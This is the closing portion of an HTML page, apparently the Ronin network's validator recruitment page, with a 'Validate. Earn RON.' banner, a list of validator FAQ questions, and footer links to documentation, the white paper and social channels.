                <div class="typo-module_t-display-sm__9lHbO typo-module_mobile-t-display-sm__DJcdx typo-module_neutral__9orA9">Join us today</div>
                <div class="Banner_SloganRow___fpFA">
                    <div class="Banner_Slogan__8ogtr">
                        <div>Validate.</div>
                        <div>Earn RON.</div>
                        <div>Make an Impact.</div>
                    </div><span target="__blank" class="Banner_ButtonWrapper__S_l7F"><button class="interact-button button-module_button__Z331g button-module_intent-default__f1RNz button-module_size-large__Nx98S button-module_variant-outlined__npN14 button-module_button-root__0roWY">Claim rewards<span class="button-module_icon-right-wrapper__WKVKF"><svg class="button-module_icon__-nXel" viewBox="0 0 20 20" width="16" height="16"><path fill="currentColor" fill-rule="evenodd" d="M12.28 5.22a.75.75 0 1 0-1.06 1.06L13.94 9H4.75a.75.75 0 0 0 0 1.5h9.19l-2.72 2.72a.75.75 0 1 0 1.06 1.06l4-4a.747.747 0 0 0 0-1.06l-4-4Z" clip-rule="evenodd"></path></svg></span></button></span></div>
            </div>
        </div>
    </div>
    <div class="Faq_Wrapper__ypVCQ">
        <div class="RoundedTopCard_borderTop__LxNyq">
            <div class="RoundedTopCard_Content__9n1ci">
                <div class="RoundedTopCard_Container__TyD7g">
                    <div></div>
                    <div class="Faq_Shape2__7kmWs"></div>
                    <div class="Faq_Shape3__1QPtH"></div>
                    <div class="Faq_Content__9xPKj">
                        <div class="Faq_Columns__rzoxZ">
                            <div class="SectionHeading_Heading__FYcM4">
                                <div class="typo-module_t-display-md__KVUIu typo-module_mobile-t-display-md__BsA5M typo-module_neutral__9orA9 typo-module_dim__qoQFh SectionHeading_Title__tPa1z"></div>
                                <div class="SectionHeading_Subtitle__OWhlx">Frequently Asked Questions</div>
                            </div>
                            <div>
                                <div class="GradientDivider_Divider__21K8M"></div>
                                <header class="Accordion_FAQRow__ePBu8">
                                    <div class="Accordion_QuestionContainer__iFyvh">
                                        <div class="typo-module_t-display-sm__9lHbO typo-module_mobile-t-display-sm__DJcdx typo-module_neutral__9orA9 Accordion_Question__vWmPP">What should I do after registering as a Validator Candidate?</div><svg viewBox="0 0 20 20" width="20" height="20"><path fill="currentColor" d="M17 9h-6V3c0-.6-.4-1-1-1s-1 .4-1 1v6H3c-.6 0-1 .4-1 1s.4 1 1 1h6v6c0 .6.4 1 1 1s1-.4 1-1v-6h6c.6 0 1-.4 1-1s-.4-1-1-1Z"></path></svg></div>
                                </header>
                                <div class="GradientDivider_Divider__21K8M"></div>
                                <header class="Accordion_FAQRow__ePBu8">
                                    <div class="Accordion_QuestionContainer__iFyvh">
                                        <div class="typo-module_t-display-sm__9lHbO typo-module_mobile-t-display-sm__DJcdx typo-module_neutral__9orA9 Accordion_Question__vWmPP">How to increase the chance of getting selected as a Standard Validator?</div><svg viewBox="0 0 20 20" width="20" height="20"><path fill="currentColor" d="M17 9h-6V3c0-.6-.4-1-1-1s-1 .4-1 1v6H3c-.6 0-1 .4-1 1s.4 1 1 1h6v6c0 .6.4 1 1 1s1-.4 1-1v-6h6c.6 0 1-.4 1-1s-.4-1-1-1Z"></path></svg></div>
                                </header>
                                <div class="GradientDivider_Divider__21K8M"></div>
                                <header class="Accordion_FAQRow__ePBu8">
                                    <div class="Accordion_QuestionContainer__iFyvh">
                                        <div class="typo-module_t-display-sm__9lHbO typo-module_mobile-t-display-sm__DJcdx typo-module_neutral__9orA9 Accordion_Question__vWmPP">What if my stake amount falls below the minimum requirement?</div><svg viewBox="0 0 20 20" width="20" height="20"><path fill="currentColor" d="M17 9h-6V3c0-.6-.4-1-1-1s-1 .4-1 1v6H3c-.6 0-1 .4-1 1s.4 1 1 1h6v6c0 .6.4 1 1 1s1-.4 1-1v-6h6c.6 0 1-.4 1-1s-.4-1-1-1Z"></path></svg></div>
                                </header>
                                <div class="GradientDivider_Divider__21K8M"></div>
                                <header class="Accordion_FAQRow__ePBu8">
                                    <div class="Accordion_QuestionContainer__iFyvh">
                                        <div class="typo-module_t-display-sm__9lHbO typo-module_mobile-t-display-sm__DJcdx typo-module_neutral__9orA9 Accordion_Question__vWmPP">What are the most important performance metrics for a validator?</div><svg viewBox="0 0 20 20" width="20" height="20"><path fill="currentColor" d="M17 9h-6V3c0-.6-.4-1-1-1s-1 .4-1 1v6H3c-.6 0-1 .4-1 1s.4 1 1 1h6v6c0 .6.4 1 1 1s1-.4 1-1v-6h6c.6 0 1-.4 1-1s-.4-1-1-1Z"></path></svg></div>
                                </header>
                                <div class="GradientDivider_Divider__21K8M"></div>
                                <header class="Accordion_FAQRow__ePBu8">
                                    <div class="Accordion_QuestionContainer__iFyvh">
                                        <div class="typo-module_t-display-sm__9lHbO typo-module_mobile-t-display-sm__DJcdx typo-module_neutral__9orA9 Accordion_Question__vWmPP">What are the rewards for validators?</div><svg viewBox="0 0 20 20" width="20" height="20"><path fill="currentColor" d="M17 9h-6V3c0-.6-.4-1-1-1s-1 .4-1 1v6H3c-.6 0-1 .4-1 1s.4 1 1 1h6v6c0 .6.4 1 1 1s1-.4 1-1v-6h6c.6 0 1-.4 1-1s-.4-1-1-1Z"></path></svg></div>
                                </header>
                                <div class="GradientDivider_Divider__21K8M"></div>
                                <a class="typo-module_t-body-md-strong__B-Sd1 typo-module_mobile-t-body-md-strong__Kd9tc typo-module_neutral__9orA9 link-module_link__Nwimt link-module_monochrome__yqKNC FaqList_ReadMoreLink__PqHNM" href="https://docs.roninchain.com/docs/validators/faq"
                                    target="__blank" rel="noreferrer">
                                    <div class="FaqList_Text__AIf3o">Read More <svg viewBox="0 0 20 20" width="20" height="20"><path fill="currentColor" fill-rule="evenodd" d="M12.28 5.22a.75.75 0 1 0-1.06 1.06L13.94 9H4.75a.75.75 0 0 0 0 1.5h9.19l-2.72 2.72a.75.75 0 1 0 1.06 1.06l4-4a.747.747 0 0 0 0-1.06l-4-4Z" clip-rule="evenodd"></path></svg></div>
                                </a>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <div class="GetStarted_ClipBackground__g7DCI">
            <div class="RoundedTopCard_borderTop__LxNyq">
                <div class="RoundedTopCard_Content__9n1ci">
                    <div class="RoundedTopCard_Container__TyD7g">
                        <div class="GetStarted_Inner__gjcpU">
                            <div class="GetStarted_shape1__uuum9"></div>
                            <div class="GetStarted_shape2__b9lXv"></div>
                            <div class="GetStarted_HeroMobile__QPiug"><img class="GetStarted_Logo__bM5nw" loading="lazy" src="./static/images/shiny-logo.png" alt="ronin-logo" />
                                <div class="GetStarted_HeroTextColumn__Zbq9D">
                                    <div class="GetStarted_Title___j7my">Let&#x27;s Build Together</div>
                                    <div class="GetStarted_Buttons__x7se5"><a href="https://skymavis.typeform.com/ronin" rel="noreferrer" target="__blank"><button class="button-module_button__Z331g button-module_intent-primary__SAO1x button-module_size-large__Nx98S button-module_button-root__0roWY">Start Building<span class="button-module_icon-right-wrapper__WKVKF"><svg class="button-module_icon__-nXel" viewBox="0 0 20 20" width="16" height="16"><path fill="currentColor" fill-rule="evenodd" d="M12.28 5.22a.75.75 0 1 0-1.06 1.06L13.94 9H4.75a.75.75 0 0 0 0 1.5h9.19l-2.72 2.72a.75.75 0 1 0 1.06 1.06l4-4a.747.747 0 0 0 0-1.06l-4-4Z" clip-rule="evenodd"></path></svg></span></button></a>
                                        <a
                                            href="./ecosystem"><button class="button-module_button__Z331g button-module_intent-default__f1RNz button-module_size-large__Nx98S button-module_variant-outlined__npN14 button-module_button-root__0roWY">Explore Ecosystem<span class="button-module_icon-right-wrapper__WKVKF"><svg class="button-module_icon__-nXel" viewBox="0 0 20 20" width="16" height="16"><path fill="currentColor" fill-rule="evenodd" d="M12.28 5.22a.75.75 0 1 0-1.06 1.06L13.94 9H4.75a.75.75 0 0 0 0 1.5h9.19l-2.72 2.72a.75.75 0 1 0 1.06 1.06l4-4a.747.747 0 0 0 0-1.06l-4-4Z" clip-rule="evenodd"></path></svg></span></button></a>
                                    </div>
                                </div>
                            </div>
                            <div class="GetStarted_HeroDesktop__eFjfP">
                                <div class="GetStarted_HeroText__P8ngy"><img class="GetStarted_Logo__bM5nw" loading="lazy" src="./static/images/shiny-logo.png" alt="ronin-logo" />
                                    <div class="GetStarted_Title___j7my">Let&#x27;s Build Together</div>
                                </div>
                                <div class="GetStarted_MainFooterLinks__KX16I">
                                    <div class="GetStarted_Buttons__x7se5 GetStarted_HideOnDesktop__KVHsH"><a href="https://skymavis.typeform.com/ronin" rel="noreferrer" target="__blank"><button class="button-module_button__Z331g button-module_intent-primary__SAO1x button-module_size-large__Nx98S button-module_button-root__0roWY">Start Building<span class="button-module_icon-right-wrapper__WKVKF"><svg class="button-module_icon__-nXel" viewBox="0 0 20 20" width="16" height="16"><path fill="currentColor" fill-rule="evenodd" d="M12.28 5.22a.75.75 0 1 0-1.06 1.06L13.94 9H4.75a.75.75 0 0 0 0 1.5h9.19l-2.72 2.72a.75.75 0 1 0 1.06 1.06l4-4a.747.747 0 0 0 0-1.06l-4-4Z" clip-rule="evenodd"></path></svg></span></button></a>
                                        <a
                                            href="./ecosystem"><button class="button-module_button__Z331g button-module_intent-default__f1RNz button-module_size-large__Nx98S button-module_variant-outlined__npN14 button-module_button-root__0roWY">Explore Ecosystem<span class="button-module_icon-right-wrapper__WKVKF"><svg class="button-module_icon__-nXel" viewBox="0 0 20 20" width="16" height="16"><path fill="currentColor" fill-rule="evenodd" d="M12.28 5.22a.75.75 0 1 0-1.06 1.06L13.94 9H4.75a.75.75 0 0 0 0 1.5h9.19l-2.72 2.72a.75.75 0 1 0 1.06 1.06l4-4a.747.747 0 0 0 0-1.06l-4-4Z" clip-rule="evenodd"></path></svg></span></button></a>
                                    </div>
                                </div>
                            </div>
                            <div class="GetStarted_DesktopRow__8amrv">
                                <div class="GetStarted_Buttons__x7se5 GetStarted_HideOnTablet__ScnU4"><a href="https://skymavis.typeform.com/ronin" rel="noreferrer" target="__blank"><button class="button-module_button__Z331g button-module_intent-primary__SAO1x button-module_size-large__Nx98S button-module_button-root__0roWY">Start Building<span class="button-module_icon-right-wrapper__WKVKF"><svg class="button-module_icon__-nXel" viewBox="0 0 20 20" width="16" height="16"><path fill="currentColor" fill-rule="evenodd" d="M12.28 5.22a.75.75 0 1 0-1.06 1.06L13.94 9H4.75a.75.75 0 0 0 0 1.5h9.19l-2.72 2.72a.75.75 0 1 0 1.06 1.06l4-4a.747.747 0 0 0 0-1.06l-4-4Z" clip-rule="evenodd"></path></svg></span></button></a>
                                    <a
                                        href="./ecosystem"><button class="button-module_button__Z331g button-module_intent-default__f1RNz button-module_size-large__Nx98S button-module_variant-outlined__npN14 button-module_button-root__0roWY">Explore Ecosystem<span class="button-module_icon-right-wrapper__WKVKF"><svg class="button-module_icon__-nXel" viewBox="0 0 20 20" width="16" height="16"><path fill="currentColor" fill-rule="evenodd" d="M12.28 5.22a.75.75 0 1 0-1.06 1.06L13.94 9H4.75a.75.75 0 0 0 0 1.5h9.19l-2.72 2.72a.75.75 0 1 0 1.06 1.06l4-4a.747.747 0 0 0 0-1.06l-4-4Z" clip-rule="evenodd"></path></svg></span></button></a>
                                </div>
                                <div class="GetStarted_LinkColumns__AWWRC">
                                    <div>
                                        <div class="GetStarted_LinkColumn__JXhL5"><span>Learn</span><a href="https://roninchain.com/blog/posts/how-to-buy-ron" target="_blank" class="GetStarted_Link__OdHJj" rel="noreferrer">Buy RON</a><a href="https://docs.roninchain.com/docs/basics" target="_blank"
                                                class="GetStarted_Link__OdHJj" rel="noreferrer">About Ronin</a><a href="https://docs.skymavis.com/ronin/overview" target="_blank" class="GetStarted_Link__OdHJj" rel="noreferrer">Build dApps</a></div>
                                    </div>
                                    <div>
                                        <div class="GetStarted_LinkColumn__JXhL5"><span>Developers</span><a href="https://docs.skymavis.com/ronin/overview" target="_blank" class="GetStarted_Link__OdHJj" rel="noreferrer">Docs</a><a href="https://github.com/axieinfinity/" target="_blank" class="GetStarted_Link__OdHJj"
                                                rel="noreferrer">Github</a></div>
                                    </div>
                                    <div>
                                        <div class="GetStarted_LinkColumn__JXhL5"><span>Resources</span><a href="https://docs.roninchain.com/basics/white-paper/" target="_blank" class="GetStarted_Link__OdHJj" rel="noreferrer">White paper</a><a href="https://roninchain.com/blog/" target="_blank"
                                                class="GetStarted_Link__OdHJj" rel="noreferrer">Blog</a></div>
                                    </div>
                                    <div>
                                        <div class="GetStarted_LinkColumn__JXhL5"><span>Network</span><a href="./validator" target="_blank" class="GetStarted_Link__OdHJj" rel="noreferrer">Become a Validator</a><a href="./delegator" target="_blank" class="GetStarted_Link__OdHJj" rel="noreferrer">Become a Delegator</a></div>
                                    </div>
                                    <div>
                                        <div class="GetStarted_LinkColumn__JXhL5"><span>Media</span><a href="https://drive.google.com/drive/folders/1ZM0R6fd13IhvBpTFwOBebYZqmTxQNgJi/" target="_blank" class="GetStarted_Link__OdHJj" rel="noreferrer">Brand kit</a></div>
                                    </div>
                                </div>
                            </div>
                            <div class="GetStarted_Footer__kAf0E">
                                <div class="GetStarted_LeftLinks__02kob"><a class="typo-module_t-body-md__XGPoD typo-module_mobile-t-body-md__-HKdi typo-module_neutral__9orA9 link-module_link__Nwimt link-module_monochrome__yqKNC" href="https://docs.roninchain.com/docs/developers/portal" target="__blank">Build with Us</a>
                                    <a
                                        class="typo-module_t-body-md__XGPoD typo-module_mobile-t-body-md__-HKdi typo-module_neutral__9orA9 link-module_link__Nwimt link-module_monochrome__yqKNC" href="https://roninchain.com/blog" target="__blank">Newsletter</a>
                                        <div class="GetStarted_Divider__Cg9FK"></div><a class="typo-module_t-body-md__XGPoD typo-module_mobile-t-body-md__-HKdi typo-module_neutral__9orA9 link-module_link__Nwimt link-module_monochrome__yqKNC" href="https://cdn.axieinfinity.com/skymavis/terms-of-use.pdf"
                                            target="__blank">Terms</a></div>
                                <div class="GetStarted_RightLinks__ehISK">
                                    <div class="typo-module_t-body-md__XGPoD typo-module_mobile-t-body-md__-HKdi typo-module_neutral__9orA9 typo-module_dim__qoQFh GetStarted_Copyright__AmgVU">© 2024 Ronin</div>
                                    <div class="GetStarted_Divider__Cg9FK"></div>
                                    <div class="GetStarted_IconLinks__Cd9V7">
                                        <a href="https://twitter.com/Ronin_Network" target="_blank" rel="noreferrer">
                                            <div class="IconLink_Wrapper__DlQGu"><svg viewBox="0 0 20 20" width="20" height="20"><path d="M2.04069 2L8.48459 10.8249L2 18H3.45942L9.13667 11.7181L13.7237 18H18.6902L11.8837 8.67867L17.9195 2H16.4601L11.2317 7.78548L7.00716 2H2.04069ZM4.18688 3.10107H6.46849L16.5437 16.8988H14.2621L4.18688 3.10107Z" fill="currentColor"></path></svg></div>
                                        </a>
                                        <a href="https://discord.gg/roninnetwork" target="_blank" rel="noreferrer">
                                            <div class="IconLink_Wrapper__DlQGu"><img src="./static/images/discord.png" alt="discord-icon" /></div>
                                        </a>
                                    </div>
                                </div>
                                <div class="GetStarted_MobileBottomRow__eDQks">
                                    <div class="typo-module_t-body-md__XGPoD typo-module_mobile-t-body-md__-HKdi typo-module_neutral__9orA9 typo-module_dim__qoQFh">© 2024 Ronin</div>
                                    <div class="GetStarted_Divider__Cg9FK"></div>
                                    <div class="GetStarted_IconLinks__Cd9V7">
                                        <a href="https://twitter.com/Ronin_Network" target="_blank" rel="noreferrer">
                                            <div class="IconLink_Wrapper__DlQGu"><svg viewBox="0 0 20 20" width="20" height="20"><path d="M2.04069 2L8.48459 10.8249L2 18H3.45942L9.13667 11.7181L13.7237 18H18.6902L11.8837 8.67867L17.9195 2H16.4601L11.2317 7.78548L7.00716 2H2.04069ZM4.18688 3.10107H6.46849L16.5437 16.8988H14.2621L4.18688 3.10107Z" fill="currentColor"></path></svg></div>
                                        </a>
                                        <a href="https://discord.gg/roninnetwork" target="_blank" rel="noreferrer">
                                            <div class="IconLink_Wrapper__DlQGu"><img src="./static/images/discord.png" alt="discord-icon" /></div>
                                        </a>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    </div>
    </div>
   
   
</body>

</html>